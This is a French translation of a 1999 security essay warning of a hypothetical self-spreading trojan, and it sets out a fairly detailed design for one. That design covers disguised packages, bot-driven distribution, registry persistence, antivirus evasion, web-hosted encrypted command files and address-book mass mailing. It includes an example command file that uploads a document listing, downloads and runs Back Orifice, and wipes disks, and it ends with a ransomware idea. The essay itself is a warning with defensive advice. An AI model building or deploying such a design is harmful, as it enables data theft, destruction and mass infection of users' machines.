[Kitetoa, les pizzaïolos du Ouèb

Le pire des cauchemars

Tout le texte sur une seule page HTML...
(ceci équivaut à peu près à 10 pages A4)

 
Sommaire
Première partie : Background
Deuxième partie : Données de base
Troisième partie : Description détaillée
Quatrième partie: QQNNPP (Questions Que Nous Ne Devrions Pas Poser)

 

 

Avant de commencer
= = = = = = = = = = = =
Ce document a été écrit avec beaucoup de soin. Je vous encourage à le lire entièrement avant de le commenter. Je vous recommande même d'y penser pendant un moment avant de le commenter. Si vous avez des commentaires constructifs, merci de les envoyer à :

roelof@cube.co.za

Vous pouvez dupliquer ce document comme il vous semble - mais s'il vous plaît, ne le massacrez pas-, copiez *la totalité* du texte et citez-moi. J'apprécierai également si vous me tenez au courant de l'endroit où vous le publiez, juste pour en conserver une trace.

Amicalement,
Roelof Temmingh
Afrique du Sud
29/07/99


NOTE DU TRADUCTEUR:
La traduction française de ce document a été réalisée en août 1999 par Kitetoa (kitetoa@kitetoa.com) qui pense ingénument qu'il vaut la peine d'être distribué au plus grand nombre, y compris ceux qui ont du mal à comprendre l'australien. Cependant, Kitetoa n'ayant pas non plus la science infuse, il est possible que des erreurs de traduction se soient subrepticement insérées contre notre volonté... Enfin, comme le dit son auteur, lisez ce document jusqu'à la fin pour vous faire une idée précise du concept qui y est développé. Ne vous arrêtez pas en pensant qu'il vous décrit un simple cheval de Troie.



Index:
= = = = = =
Première partie : Background
Deuxième partie : Données de base
Troisième partie : Description détaillée
Quatrième partie: QQNNPP (Questions Que Nous Ne Devrions Pas Poser)

Première partie : Introduction à votre pire cauchemar
= = = = = = = == = = = = = = == = = = = = = == = = = = = = =
"Je suppose que cela devait arriver un jour - s'il vous plaît, faites passer le mot". Ce message a été envoyé dans une mailing list par Gene Spafford le 3 novembre 1988 - au temps où Internet, toujours dans ses premiers jours, était un outil pour les universitaires et un jouet pour les technophiles. Spafford se référait dans son message à un ver (worm) informatique né sur Internet (une sorte de virus auto alimenté) qui a finalement atteint plus de 10% des 60.000 hosts alors connectés à Internet. Bien que la majorité des gens n'aient jamais entendu parler d'Internet et que l'élection Dukakis-Bush ne soit qu'à quelques jours de là, l'incident avait fait la une de la plupart des grands journaux. Ceci n'est pas dû au fait que  le ver ait été particulièrement dangereux - il était au contraire plutôt bénin- mais au fait que les journalistes ont mesuré le potentiel de gros problèmes qu'il représentait. Sans un petit défaut de programmation dans le code de ce ver, il n'aurait jamais été découvert. Il y a dix ans, le "ver Morris" a choqué le mode en révélant la fragilité d'Internet. Aujourd'hui, peu de choses ont changé. En dépit de dix années de nouveaux savoir et d'expérience, Internet est aujourd'hui au moins aussi vulnérable aux attaques de type de celle de Morris qu'il y a dix ans. En fait, sans doute plus. Surtout si l'on tient compte de cela:

1. Il y a dix ans, le ver de Morris utilisait une faiblesse commune à différents systèmes Unix pour prendre le contrôle des ordinateurs et se propager. Aujourd'hui, le même système d'exploitation est installé sur 90% des ordinateurs individuels. Un seul programme pourrait s'attaquer à toutes ces machines.

2. Il y a dix ans, Internet appartenait à une élite de spécialistes et de professionnels. Ils comprenaient parfaitement leurs ordinateurs et les administraient de près. Aujourd'hui tous les foyers ont un ordinateur et une connexion à Internet. Et l'utilisateur moyen ne connaît pas la différence entre "email" et "mpeg".

3. Il y a dix ans, Internet était principalement utilisé par des scientifiques, des universitaires et plus généralement pour la recherche. Aujourd'hui, c'est un vecteur essentiel de business. Des milliards de dollars transitent par Internet tous les jours sous tous type de formes et la plupart des sociétés seraient simplement incapables de faire leur business sans leurs systèmes d'information.

L'utilisation généralisée de firewalls sur les réseaux informatiques est une faible aide pour prévenir le risque. Le risque n'est pas ici celui d'une attaque par un quelconque hacker sur Internet, mais un programme non désiré qui tourne sur un ordinateur à l'intérieur d'un réseau protégé. La partie qui suit décrit combien il serait simple de faire un tel programme. Au fur et à mesure de votre lecture, vous allez découvrir les effrayantes vérités suivantes:

- Combien il est simple d'écrire un tel programme. Il en existe de nombreux similaires très connus.

- Combien il est simple de le diffuser. Internet est est le système de distribution massive idoine et sa force est aussi sa faiblesse.

- Combien il est simple de cacher un tel programme. L'utilisateur moyen ne comprend pas la moitié des process qui tournent légitimement sur son ordinateur et se rendra encore moins compte qu'un tel programme tourne sur son ordinateur que celui-ci fait son maximum pour être invisible.

- Combien il est difficile d'arrêter un tel programme. Il peut se répandre à la vitesse de la lumière, prendre n'importe quelle forme, se cacher et muter à chaque nouvelle installation. Des dommages énormes pourraient être fait avant que sa propagation puisse être arrêtée.

- Combien un tel programme peut être affreux. Ce type de software pourrait mettre à genoux des secteurs entiers de l'industrie. Une infection bien préparée et soutenue par de mauvaises intentions ferait du virus de Morris en 1988 une pâle version de la grippe.

Alors, que peut-on faire pour prévenir un tel cauchemar? Pas grand chose, je le crains. Comme les habitants d'une île volcanique, nous devons être à l'écoute et espérer que nous pourrons nous rendre compte de l'éruption assez tôt pour éviter un désastre. Voici quelques précautions qu"une entreprise peut prendre:

1. Politique. L'utilisation de tous les programmes non expressément autorisés doit être interdite

2. Education de l'utilisateur, éducation de l'utilisateur, éducation de l'utilisateur. Apprenez à vos utilisateurs les dangers liés à l'utilisation de programmes obtenus de sources inconnues.

3. Audits. Réalisez des vérifications régulières pour savoir ce qui est installé et ce qui tourne sur les P.C.

4. Systèmes d'exploitation. Un système d'exploitation solide avec utilisateurs multiples peut minimiser les dommages réalisés par un virus ou un ver. Installez plutôt Windows NT que Windows 95 ou 98, envisagez l'utilisation d'autres systèmes d'exploitation comme Line ou BSD.

Diversité. En mélangeant un certain nombre de systèmes d'exploitation, il est possible de minimiser les dommages réalisés par un virus ou un ver. Ceci introduit toutefois une complexité accrue dans la gestion de ces systèmes.

6. Sécurité réseau. Firewalls, cryptographie, sécurité des systèmes d'exploitation, etc. rendent la vie plus difficile au ver. En particulier, les détecteurs de virus, les détecteurs de contenu HTML, FTP et SMTP au niveau du firewall  permettent aussi de se protéger contre ce type de dangers. N'excluez pas de détruire systématiquement les pièces jointes exécutables et autres contenus actifs.

7. IDS. Les systèmes intrusion détection (IDS) doivent détecter les attaques provenant de l'intérieur du réseau comme de l'extérieur

8. Pensez au pire. Mettez en place des plan de continuité et prévoyez des sites de back-up pour restaurer. Testez et utilisez ces systèmes.

Pendant que vous lisez ce qui suit, imaginez les conséquences de la distribution d'un tel animal et demandez-vous combien de temps va s'écouler avant que vous vous disiez "Je suppose que cela devait arriver un jour..."

Deuxième Partie: L'ossature de base
= = = = = = = = = = = = = = = = = = = = = = = =
Cette partie du document tentera de donner une vue très basique de la façon dont fonctionne le cheval de Troie/Virus. Elle est *supposée* poser des questions -auxquelles nous répondrons dans la troisième partie. Elle ne donnera au lecteur qu'une idée de ressorts du virus. C'est la partie ""communiqué de presse" du document.

Le Package
---------

Le Package est un seul exécutable qui contient deux parties, un programme fonctionnel normal  et l'Ingrédient Actif (IA). Le programme normal peut être n'importe quoi, mais doit être intéressant pour la communauté Internet. Parmi les exemples, on peut imaginer des économiseurs d'écran, des AVI, des MPEGs, des animations Flash, des softwares anti-virus, un nouveau logiciel de piratage ou même une solution anti virus.

Ce type de package doit être customisé en fonction de son mode de diffusion: le réseau.

Infection initiale
---------

 Le package sera distribué via Internet. Cette opération est réalisée par des "robots" qui uploaderont ces packages sur des serveurs FTP, qui les posteront en masse par mail, repackageront des softwares existants pour y ajouter les IA et DCC de manière aléatoire aux utilisateurs sur l'IRC. Le net doit être inondé de programmes infectés, tous différents en taille et en fonctionnalité.

Les méthodes classiques de propagation d'un virus peuvent aussi être utilisées. L'infection initiale pourrait durer environ deux mois.

Au moment de la première exécution sur une machine cliente
-----------------------------------------------------------------------------
Un utilisateur obtient le package et l'exécute.

- Installation:
L'IA se renomme et prend un nom qui ne soit pas suspect. L'IA fera en sorte d'être exécuté a chaque fois que la machine est redémarrée.

- Enregistrement sur le serveur:
L'IA attendra jusqu'à ce qu'il détecte la possibilité de se connecter à un serveur sur Internet. Lorsque cela arrivera, l'IA contactera un (ou des) serveur(s) Web(s) prédéfini(s), uploadera des informations sur le serveur. Il sauvegardera un fichier sur le serveur qui contiendra des informations détaillées sur la machine qui l'héberge. Chaque IA sauvegardera un fichier qui aura un nom / numéro de série unique.

Activité de l'IA au jour le jour
--------------------------
L'IA épie l'activité de la machine qui l'héberge et s'il détecte un trafic vers le WWW, il vérifiera périodiquement la présence ou non d'instructions, postées sur des serveurs Web prédéfinis. Ces commandes seront téléchargées du WWW et exécutées sur la machine hôte. Les commandes seront trouvées dans un fichier qui correspondra au numéro de série que l'IA aura défini lors du premier contact. L'IA exécutera les commandes trouvées dans ce fichier. Si l'IA ne peut trouver ce fichier, il se repliera sur un fichier contenant des commandes générales non personnalisées. Si ce dernier fichier ne peut être trouvé, l'IA se contentera d'exécuter des instructions pré-programmées.

Suite du processus d'infection:
----------------------
Chaque hôte qui est infecté "rend compte" à l'un des serveurs prédéfinis. Il augmente un fichier compteur. Chaque hôte qui est infecté lors de la première vague augmente ainsi un fichier qui comptabilise les machines infectées. Lorsque ce fichier atteint une masse critique, tous les IA entameront une deuxième procédure d'infection:

Les IA extrairont les adresses e-mail contenues dans les carnets d'adresses des mailers classiques (Outlook, Netscape, Eudora). Les IA commenceront alors à envoyer des emails avec des pièces-jointes aux adresses collectées. L'attachement sera le package. Le rythme auquel les IA enverront les mails sera contrôlé via les fichiers de commandes récupérés sur les sites Web.

Troisième partie: Comment ça marche?
= = = = = = = = = = = = = = = = = = = = = = = =
Cette partie tentera d'exposer les points à prendre en compte, les spécifications techniques afin que chacun puisse comprendre la technologie qui permet de réaliser un tel software. Elle est principalement destinée aux programmeurs ou à ceux qui ont des connaissances techniques.

Infection initiale:
----------------------
-Bots de repackaging
Ce sont des robots qui downloaderont des exécutables de sites connus (Tucows, etc.) et les repackageront pour qu'ils contiennent le package. Ces robots pourront recevoir comme instruction de visiter certains serveurs plus souvent que d'autres et de télécharger certains fichiers plutôt que d'autres. Ces robots auront la capacité de décompresser des documents, de les reformater et de les recompresser.

- Bots de DCCsend
Ce sont des robots qui seront connectés à plusieurs canaux sur l'IRC et vont DDC le package à des utilisateurs qui utilisent  Mirc, le client IRC standard (de fait) de Windows. Les robots pourront être dotés d'une certaine intelligence leur permettant de convaincre les utilisateurs d'accepter le DCC. Les bots pourront être situés dans les canaux de Warez, et distribuer un programme commercial repackagé pour contenir l'IA.

- Bots FTP put
Ces robots mèneront des recherches sur le Net pour trouver des serveurs FTP avec des directories publics (writables) où ils pourront uploader le package.

- Bots de mail
Ces bots seront similaires à des programmes de mailing de masse qui enverront le package a des utilisateurs en se faisant passer pour des organisations comme Hotmail, Geocities, etc. Le package sera présenté comme un cadeau, c'est à dire un économiseur d'écran ou un éditeur HTML.

Notez que tous ces moyens de diffusion impliquent que le récipiendaire soit connecté d'une manière ou d'une autre au Net.

L'IA lui-même peut être codé de manières différentes afin qu'il y  ait des centaines de signatures différentes -ceci rendra la tâche plus compliquée pour les éditeurs d'anti-virus lorsqu'ils voudront créer un programme qui recherche une signature par le code.

Premier contact
--------------
Quand l'utilisateur/trice downloade le package, il/elle l'exécutera. Le package va déclencher le programme normal et l'IA s'exécutera. L'IA s'installera dans le système de telle façon qu'il sera déclenché à chaque démarrage. Il se déguisera en se renommant avec un nom qui n'éveillera pas les soupçons. Ce nom contiendra des des lettres choisies au hasard et ne sera pas plus long que 6 caractères. A chaque démarrage il se renommera et procédera aux modification nécessaires en prévision du prochain. Il pourrait aussi modifier la méthode de démarrage : modifier la base de registre ou le fichier win.ini.

L'IA doit être en mesure de se détecter lui-même. Cela permettra d'éviter que l'IA s'installe à chaque fois que le package est exécuté. Ceci peut être fait en "marquant" le host - cela ne révélera pas où l'IA est placé, mais juste que le host est infecté. Ce "marquage" compliquera encore plus le processus de détection car ce marquage devra être enlevé avant que le host puisse être réinfecté pour des tests.

L'IA déterminera s'il est situé dans un environnement online (il peut établir une session avec une machine sur Internet). Si une connexion directe n'est pas possible, il déterminera si un proxy est présent et utilisera ce proxy pour se connecter à Internet. Idéalement, l'IA surveillera le trafic sur le port 80 et déterminera la meilleure voie de sortie -directe ou via un proxy. Comme cela pourrait impliquer l'installation d'un driver de paquets spécifique, l'IA pourrait surveiller le chargement de CPU par différentes applications et enregistrer lorsqu'il s'agit d'utilisation de CPU par un navigateur (IE ou Netscape).

L'IA ne tentera une connexion que s'il peut déterminer de manière sure qu'il existe une connexion au Net.

L'IA disposera d'une liste de serveurs qui seront prêts à recevoir son enregistrement. Pour chaque IA, cette liste contiendra des préférences aléatoires. L'IA tentera de contacter le serveur Web par ordre décroissant. Il enverra un rapport au serveur Web de la même manière que lorsque les browsers envoient un fichier sur un serveur. Cette liste pourrait contenir jusqu'à 75 sites différents.

Le premier rapport qui sera envoyé par l'IA devrait contenir les renseignements suivants:
- Numéro de série généré par l'IA
- Nom du DNS/ IP
- Firewall, Oui/Non
- Proxies
- DHCP Oui/Non
- Information sur les interfaces (type, vitesse, etc.)
- Plate-forme (CPU, mémoire, etc.)
- Browser (I.E., Netscape)
- Mailer (Outlook, Eudora, etc.)
- Programmes enregistrés
- Nom réel d'utilisateur
- Nom d'utilisateur
- Adresse e-mail

La plupart de ces informations peuvent être extraites de la base de registres. L'IA enregistrera ce rapport dans un fichier qui aura le même nom que le numéro de série auto-généré.

L'IA tentera de télécharger sur le serveur Web un fichier appelé "compteur". Ce fichier contiendra un chiffre. Il augmentera ce chiffre et uploadera ce fichier avec le même nom. Ce fichier est, comme nous l'avons vu précédemment, un compteur qui comptabilise le nombre de hosts infectés qui ont pu contacter les serveurs. Un fichier "compteur.lock" peut être utilisé pour s'assurer que deux IA n'accèdent pas simultanément au fichier. Les IA bloqués recommenceraient plus tard.

Il est *très* important que le virus ne soit pas découvert au moment initial de l'infection. L'IA ne doit en aucun cas montrer sa présence et doit s'autodétruire plutôt que d'être repéré.

Les serveurs Web
-------------
Ce sont des serveurs Web  où les IA s'enregistreront et où ils prendront les informations nécessaires pour leur activité. Ils devront tous être accessibles par le public et seront situés là où l'on peut bénéficier d'espace gratuitement comme chez Geocities, Iname, Yahoo, pour en citer quelques uns. Plusieurs comptes devront être créés sur chaque serveur de ce type.

Les commandes "déposées" pour les IA  seront répliquées entre serveurs. Cela implique que toutes les commandes seront présentes sur tous les serveurs, afin qu'un certain IA puisse se fournir sur plusieurs serveurs (au cas où l'un d'entre eux serait fermé par un administrateur, tombé ou occupé).

Répliquer les données peut être aisément automatisé si le serveur accepte les connexions FTP. Si cela n'est pas le cas, un script PERL peut être écrit pour interroger des interfaces Web. Comme il est envisagé que le virus sera contrôlé par un groupe de personnes,un CRC checksum de tous les fichiers de commandes pourra être stocké sur les serveurs. La réplication n'aura lieu que lorsque les CRC checksums entre les serveurs ne colleront plus.

Pour éviter la détection, de faux serveurs Web peuvent être inclus dans la liste. L'IA saura que ces sites ne contiennent pas de "zone de livraison" et ne tenteront pas d'y déposer des rapports ou d'en retirer des fichiers de commandes. Le seul but de ces serveurs sera de créer une confusion afin d'égarer les fabriquants d'anti-virus lorsque l'IA sera détecté.

D'autres informations sur le format et la distribution des commandes suivront.

Activité au jour le jour de l'IA
-------------------------
Quand l'IA détecte qu'il peut ouvrir un chemin vers le serveur Web de son choix (comme expliqué dans le passage sur le "Premier contact" dans la première partie), il downloadera un fichier ".cmd". S'il ne peut le faire, il tentera de downloader un fichier appelé "general.cmd". Le premier  est un fichier qui contient des commandes spécifiques pour cet IA. L'IA déterminera et gardera trace des commandes reçues et exécutées. Il n'agira que si le fichier de commandes  contient un chiffre supérieur à celui enregistré en dernier dans son compteur interne. Le deuxième fichier est utilisé pour envoyer des commandes qui peuvent être exécutées par tous les IA. Ce seront les commandes par défaut sauf si un contrôleur a quelque chose de particulier en tête pour un host en particulier.

Un fichier compteur sera établi pour savoir combien d'IA ont effectué les commandes par défaut.

Un fichier de commandes devrait contenir les instructions suivantes:

-remove()
Enlève l'IA de la mémoire, des disques durs et de la stack IP

- mass destruct()
Détruit toutes les données et redémarre la machine

- sync (time)
Demande à l'IA d'effectuer périodiquement une commande fetch toutes les (time) minutes. L'IA ne fera toutefois cela que lorsqu'il peut le faire de manière discrète et sure.

- batch begin, batch end
Toutes les commandes batch seront exécutées comme un travail batch. Les commandes entre "begin" et "end" devraient être choisies pour rediriger leur contenu final dans un fichier (voir exemple).

- download (filename, local name)
Downloade depuis un serveur Web et sauvegarde un fichier sur le disque dur du host

- upload (local file, remote file)
Uploade le fichier sur le serveur

- update (local file)
L'IA se téléchargera et se mettra à jour lui-même. Ceci pourra être utile lorsque les fabriquants d'anti-virus auront commencé à se rendre compte du danger.

- spread (count, rate)
Voir section sur la deuxième vague d'infection

- default begin (count), default end
Les commandes entre default begin et default end seront exécutées si l'IA ne peut pas se connecter aux serveurs

Le fichier type de commandes peut bien sur être élargi pour prendre en compte des commandes typiques de B.O. Un exemple de fichier commande de l'IA pourrait ainsi être:

default begin 4
 c;mass_destruct
default end
sync 15
batch begin
 dir c:\*.doc /s > c:\dirall.docs
  upload c:\dirall.docs 16643dhas13.all_docs
  del c:\dirall.docs
  download bo.exe c:\winnt\system32\taskbar.exe
  c:\winnt\system32\taskbar.exe
batch end
spread 25000,5
END

Dans cet exemple, l'IA effacera toutes les données sur  les disques quand le contact sera perdu avec les quatre premiers serveurs de sa liste. Il tentera de downloader des fichiers de commandes toutes les 15 minutes. Il uploadera un fichier appelé 16643dhas13.all_docs contenant une liste de tous les *.doc présents sur le disque C:. Il downloadera et installera Back Orifice. La commande "spread" sera expliquée dans la partie suivante.

Notez le "END" à la fin du fichier. Si l'IA ne trouve pas le mot "END" à la fin du fichier de commandes il considérera ce fichier comme non complet et n'exécutera pas les commandes.

Avec un  peu de travail, le fichier peut être crypté. Ce qui rendra bien plus complexe les tentatives de compréhension du fonctionnement du virus. Cela permettra aussi d'éviter que les fournisseurs d'anti-virus puissent envoyer une commande qui effacerait l'IA comme "remove()".

La combinaison de la cryptographie et de la commande "default begin default end" est un concept intéressant. Si le host est présent sur le Net, il peut être contrôlé à distance. Si le site que l'IA doit contacter est fermé, le host tombe avec... les fabriquants d'anti-virus ne peuvent pas communiquer avec l'IA parce que la communication est cryptée. La seule solution pour être vraiment en sécurité est de déconnecter le host d'Internet.

Seconde vague d'infection
-------------------------
Toutes les IA qui s'enregistrent incrémentent le fichier "compteur". La commande "spread" agit sur le nombre contenu dans le fichier "compteur". Si le chiffre est trop grand une seconde vague d'infection est déclenchée à un certain rythme.

L'IA va rechercher les adresses e-mail dans les mailers . Il va extraire l'information stockée par le mailer (SMTP, gateway, adresse locale de l'utilisateur, etc.) de la base de registres ou du client mail. L'IA ne tiendra pas compte des adresses du même domaine (il n'enverra pas de message à bobby@bobby.com si le domaine local est bobby.com). Ceci permettra d'éviter qu'il ne soit trop rapidement repéré en raison d'échanges entre personnes d'une même entreprises ("tu m'as envoyé un mail avec un jeu sympa" -- "non, je ne t'ai jamais envoyé ça").

L'IA va commencer à envoyer des packages à un certain nombre de personnes chaque jour. Chaque message envoyé contiendra des objets différents (regarde ça, pour information, etc.). Le rythme d'envois peut être contrôlé via le fichier de commandes.

Imaginons que nous avons une base installée initiale de 10.000 (ce qui est très faible). Si nous partons sur un rythme d'envoi de 7 virus/cheval de Troie, nous obtenons ce qui suit:

1ère vague: 70.000
2ème vague: 490.000
3ème vague: 3.430.000
4ème vague: 24.000.000

Si l'on estime que seuls 75 des récipiendaires auront un système d'exploitation qui permet au virus/cheval de Troie de s'installer et que seuls 50% des ceux-ci exécuteront la pièce jointe, nous avons:

1ère vague: 26.250
2ème vague: 68.906
3ème vague: 180.878
4ème vague: 475.807

A ce stade, les serveurs Web auront du mal à suivre. Gardez à l'esprit que la 4ème vague peut être atteinte en quelques heures, quand un mass_destruct() pourrait être déclenché.

Quatrième partie : Et maintenant, pensez à ça...
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Posez-vous les questions suivantes:

- Ceci peut-il vraiment arriver? La réponse est oui. Oui, oui, oui. Cela a été fait à une bien plus petite échelle. Pensez à Melissa, au ver de 88. Il s'agissait de petits dangers comparés à ça.

- En quoi ceci est-il différent de ce que nous avons pu voir précédemment?
La plus grande différence est que ce virus/cheval de Troie va entamer un processus de communication. Cela veut dire qu'il peut passer au travers des firewalls puisque la majorité des firewalls sont configurés pour éviter un trafic entrant, mais autorisent (certains) flux sortants. Ce virus/cheval de Troie aura la capacité de communiquer avec son contrôleur (et même, une communication inter-virus est possible). Le virus/cheval de Troie est en gros une combinaison de ce que l'on a pu voir de pire sur le Net jusqu'à aujourd'hui.

- Ce truc peut-il être construit de manière à ce qu'il soit encore plus subtil?
Bien plus, oui. Je ne suis pas le meilleur sur la Terre et je peux faire ça. Il y a plein de gens sur cette planète qui sont bien plus intelligents et meilleurs techniquement ayant la capacité et les moyens de créer ce monstre.

- Quelles seraient les implications de tout cela?
Cela pourrait impliquer qu'Internet changerait de telle manière que les entreprises ne pourraient plus l'utiliser pour en faire un outil commercial. Retour donc à l'ancien temps des vastes réseaux ouverts de la recherche.

- Le monde de la sécurité est-il prêt à faire face?
Pas vraiment. Quand le virus/cheval de Troie entamera sa deuxième vague, il pourra se propager sur des millions de hosts en quelques heures et la déconnexion de ces hosts serait un désastre. Souvenez-vous que le rythme de propagation de l'anti virus est au mieux aussi rapide, ou généralement,  moins rapide, que celui du virus.

-Que se passerait-il s'il était placé dans un produit connu et en lequel les utilisateurs ont confiance?
Je ne veux même pas y penser...

- Comment pouvons-nous savoir qu'il n'existe pas encore?
On ne peut pas. C'est étrange que nos amis du cDc et de L0pht n'aient pas sorti quelque chose de similaire? Où l'ont-il fait? Hmmmmmm? [note de Kitetoa: ce texte a initialement été publié sur un site "contrôlé" par des membres de L0pht et du cDc]

- Pourquoi avez-vous écrit ce texte?
Je pense qu'un monstre de ce type est sur le point d'être diffusé. Ce ne sera qu'une question de temps. La seule chose qui empêche les gens qui en ont les capacités d'écrire ce programme est  qu'ils ne veulent pas le faire parce qu'en tant qu'experts, ils en connaissent les implication.

Encore un pas plus loin (le vrai mauvais côté de la chose)
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Voyons... Que se passerait-il si l'IA encryptait tous les fichiers *.doc, *.cpp, *.c et envoyait les clefs à un serveur Web?Je vois déjà ça: "rachetez votre code et vos documents à notre prix particulièrement bas"...

Dernier mot et merci
= = = = = = = = = = = = = = = = =
Et vous pensiez que tout ce que nous faisons en Afrique du Sud c'est d'éviter les éléphants....
Mes sincères remerciements vont à Charl pour ses idées et pour avoir écrit la première partie.

 


Voilà, la traduction fut longue, mais cela en valait la peine. Si vous avez vu des erreurs, merci de nous les signaler en écrivant à webmaster@kitetoa.com


Retour au sommet de cette montagne HTML

 

Page d'accueil

Nous écrire
By mail

Nous envoyer des commentaires
By la page de le Feed-Back

Les mailing-lists

Nouveautés

Les stats du serveur

et...

Qui sommes-nous?

Le Sommaire
de
Kitetoa
(orientation...)

Sommaire général du site
(voir tout le contenu)

Les rubriques!

Les livres publiés par Kitetoa
Les Textes
Les interviews

Kit'Investisseurs
Fonds d'écran et autres trucs

Les rubriques!
(suite)
Les Let-R-s

Des Images
On s'en fout!

KitEcout'
KessTaVu? -KiteToile
Voyages

Statisticator, l'autre site...

Les dossiers :

Precision [ZataZ]
Le monde fou des Admins
Defcon
Le hack le plus bizarre
Guerre de l'info
Convention contre la cyber-criminalité
Hack

Questionnaire visant à améliorer le contenu de  ce site si c'est possible et pas trop compliqué

Réponses au questionnaire visant...
(merci)

Le Forum
Kitetoa-blah-blah

Rechercher
sur le site

...et sur le Net


Des liens
et
D'autres choses du Ouèb